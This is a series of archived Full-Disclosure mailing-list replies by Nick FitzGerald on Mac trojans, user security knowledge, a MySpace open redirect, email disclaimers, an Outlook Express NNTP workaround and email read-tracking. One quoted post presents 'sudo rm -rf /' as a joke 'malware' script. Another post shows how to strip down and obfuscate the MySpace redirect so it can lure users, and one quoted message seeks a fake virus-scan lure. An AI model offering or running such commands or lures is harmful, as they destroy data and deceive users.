reepex to me: > > Yes, today, the average level of clue among Mac users is probably a > > shade higher than amongst Windows users, > > Is this a joke? The reason people switch to macs is because they cannot > handle simple tasks. Isnt the main thing said by new mac users is 'it just > works' meaning 'I couldnt figure out windows' . The main users of macs are > liberal arts students and hippies .. and we all know the technical level of > these people. No, it's not a joke. First, a lot of very clueful security folk, CompSci academics and so on will "only" (or, at least, "only for my real work") use Macs. They may well just be heavy-duty-security-clueful enough to drag the average graphic artist, liberal arts, etc level above the Windows waterline. Second, in fact, I don't even care if it is badly wrong. I'm happy to concede to the Mac fanboyz that their buddies may, in fact, have a slight edge in the security clue arena _across the whole population of Mac users_. I will quickly point out things just like what you said if they seriously try to claim they have a significant edge, but my point still holds up allowing them what they perceive as the "but we're smarter" high-ground. The point is, as I thought I was making clear, even if it's true it doesn't actually help them because we are still talking about two seriously overlapping _population distributions_ (but if they continue to insist it does, all they do is show their "debate" is driven by ideology rather than facts and logic...). You've just seen the redoubtable Dr Neal K messing this up big time, so even the seriously security clueful are not necessarily on top of this. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] mac trojan in-the-wild
Steven Block to Gadi Evron: > You're an idiot. > > Save this as a script and run it, it will give you unlimited power: > > #!/bin/sh > sudo rm -rf / > > Enter your password if you are prompted. > > Oh look, malware. Were you looking in a mirror while writing that? If you think there are not "roughly similar" proportions of Mac and Windows users who will do more or less that, then I know who the idiot is here and it's not Gadi... Yes, today, the average level of clue among Mac users is probably a shade higher than amongst Windows users, and yes in its default or typical configurations Windows XP (and earlier) does make it a little easier for the terminally clueless to shoot themselves in the feet, but if you need an introduction to the basics of population statistics to understand the flaw in your "argument" I'm surprised you managed to get yourself subscribed to these lists in the first place. ... Now, if you wish to discuss the wisdom of predicting that this specific instance of Mac malware will be the real "sky is falling" moment, I think we may agree about the advisability (or otherwise) of making such predictions as loudly and publicly as Gadi did, but to dismiss this kind of malware out of hand because of your ignorance of typical user behaviour is less than clever. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Flash that simulates virus scan
Joshua Tagnore wrote: > Some time ago I remember that someone posted a PoC of a small site that > had a really nice looking flash animation that "performed a virus scan" and > after the "virus scan" was finished, the user was prompted for a "Download > virus fix?" question. After that, of course, a file is sent to the user andu > he got infected with some malware. Right now I'm performing a penetration > test, and I would like to target some of the users of the corporate LAN, so > I think this approach is the best in order to penetrate to the LAN. That approach is dying/has kinda died... > I searched google but failed to find the URL, could someone send it to > me ? Thanks! ...I mean, why arse around with authoring such large, complex SWFs when you can achieve about as compelling an effect with JavaScript? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySpace URL redirection
Fabrizio wrote: > Risk: potentially high > File under: annoyances > > "hey! check out my cool myspace page!" > > warning: will crash Internet Exploder. > > http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=176efaa7-1908-488e-aa3e-2565dcf843d6&_u=http://www.modernlifeisrubbish.co.uk/etc/crash-ie.html Open redirectors are, of course, very bad in general, but the largest "Internet properties" have whole business models absed on them (and thus on helping the fraudsters and scammers), so WTF should anyone else care about them?? For those looking for malice, this one can be simplified to: http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_u=[...] (where "[...]" is the target URI). And, of course, you can further obfuscate it by stuffing it with bogus parameters. Yet further obfuscation possibilities with escaping and so on are left as an exercise for the reader... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Email Disclaimers...Legally Liable if breached?
[EMAIL PROTECTED] to Kelly Robinson: > They don't carry any legal weight at all because they're after the > content of the message and forcibly trying to order a 3rd party into > some sort of legally binding agreement after the fact (reading the > contents of the message) would never hold up in a court. An EULA > would have a far better chance of holding up that the waste of > badwidth that these words pose. They're just someones feel good > precaution. In general I agree, but the reason I didn't mention that in my own recent response to Kelly's question is that, this morning, among the usual bounces/OOO/etc junk I got from last night's mailing list posts was the following... This email is to be read subject to the disclaimer below. I will be out of the office starting 05/10/2007 and will not return until 06/11/2007. I will respond to your message when I return from annual leave. NOTICE - This communication contains information which is confidential and the copyright of Ernst & Young or a third party. If you are not the intended recipient of this communication please delete and destroy all copies and telephone Ernst & Young on 1800 655 717 immediately. If you are the intended recipient of this communication you should not copy, disclose or distribute this communication without the authority of Ernst & Young. Any views expressed in this Communication are those of the individual sender, except where the sender specifically states them to be the views of Ernst & Young. Except as required at law, Ernst & Young does not represent, warrant and/or guarantee that the integrity of this communication has been maintained nor that the communication is free of errors, virus, interception or interference. Liability limited by a scheme approved under Professional Standards Legislation. If this communication is a "commercial electronic message" (as defined in the Spam Act 2003) and you do not wish to receive communications such as this, please forward this communication to [EMAIL PROTECTED] Most of the stuff after "NOTICE" is the kind of stuff I've previously suggested seems likely to be deemed legalistic nonsense if ever tested in court, but the interesting and new (to me) twist here is that they clearly state _up front_ that they consider that there are, possibly special, conditions on your reading/acting on the message. IA(still)NAL but I think that in general this twist does not greatly help. If they only put such disclaimers on "especially sensitive" messages to help protect themselves in the case of truly accidental disclosure (an employee accidentally mis-addressing the Email maybe???) they could claim to be practising a duty-of-care, but slapping such a notice on an auto-generated out-of-office message (and one that should not have been sent in response to a bulk mailing-list message anyway!) shows the limits of that duty-of-care, even suggesting that they are really applying a blanket "cover your arse" procedure rather than practising a real duty-of-care... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Email Disclaimers...Legally Liable if breached?
Kelly Robinson wrote: > It is common these days for email messages to contain a disclosure notice, > which may include statements such as: > >- You must read the notice > >- The views expressed in the accompanying email are not necessarily >those of the company > >- The email and any attachments should be checked for viruses. > > Do these notices carry any *legal* force? Why or Why not? Do we look like "Lawyers'R'Us" ??? In which country's, or countries', legal system(s) are you going to apply the advice you get? In general though, the feeling here (from past discussions of such things) is that they seem unlikely to be at all enforceable if they try to enforce an action or liability _on the receiver_ (the typical "if you are not the intended recipient of this message, immediately inform us, delete all copies, etc, etc" type thing) _and_ there is not already some kind of relationship between sender and receiver that may make such terms in some sense "reasonable". However, if they are simple disclaimers of the _sender's_ responsibility they may well be meaningful (your typical "nothing in this message should be construed as legal [or financial] advice..." thing from law [financial/banking] firms, possibly your second example above though note the following point, etc). There are further issues surrounding wordings such as "may", "could possibly", etc conjoined with absolute conditions, that suggest most companies that include these kinds of "disclaimers", "terms enforcers", etc never bothered to run the idea and/or wording past their lawyers, or they did but ignored the advice they got, or they have grossly incompetent lawyers... Oh, and need I say IANAL ??? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Security Advisory 10.09.07: Microsoft Windows Mail and Outlook Express NNTP Protocol Heap Overflow
iDefense Labs wrote: <<...>> > V. WORKAROUND > > Deleting the all sub-keys of the following registry keys will remove the > 'news' and 'snews' protocol handlers: > > HKEY_CLASSES_ROOT\news\shell > HKEY_CLASSES_ROOT\snews\shell If you want to do a thorough job of such mitigation as a Q&D fix, you may also need to nuke the HKEY_CLASSES_ROOT\nntp\shell entry. I can't easily test the viability of exploiting this via an nntp:// URI just now, but "nntp" is normally registered (at least with OE -- can someone check for Windows Mail?) with exactly the same sub-keys and values as the "news" and "snews" URI handlers... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Testing DidTheyReadIt.com
Juha-Matti Laurio to Thierry Zoller: [un-top-posted] > > Just a sample test of how many of you read this email. Let's see how > > good it performs for mailinglists and what comes out. > > Your headers etc. doesn't state that this service is in use. Maybe not _directly_, but comparing Received: headers in other Email Thierry has sent to Full-Disclosure from his @Zoller.lu address, you quickly see that hyperion.vo.lu is usually (??) the machine that injects such messages into the mail chain, whereas "his" test message was injected by colibri.e-mail-servers.com Aside from being totally useless "against" those who use text-only MUAs, this kind of service is generally useless because increasingly, even vendors like MS realize that user privacy is actually somewhat important and increasingly make NOT retrieving remote images (and other content) in "rich text" Emails the default, rather than just providing an option to turn off such attrocities should the user be aware enough to go looking for such an option... This is an example of a service that, in general, should not work, and in future will be increasingly more useless, I think. In the meantime, all (???) those using it should be asking what kind of data leakage they are exposing themselves to, through possible message content scanning and sender/receiver address usage patterns, among others. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What does everyone make of this
[EMAIL PROTECTED] wrote: > > "posted on 11-9-2007 @ 01:09 PM". > > European style, day-month-year. Since when did "European" mean "pretty much anything outside the US/Nth America"??? You yanks really should get over your backward view of dates, just as you Northern Hemisphericals should get over referring to (roughly) the months June, July and August as "summer" when addressing a potentially international audience... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
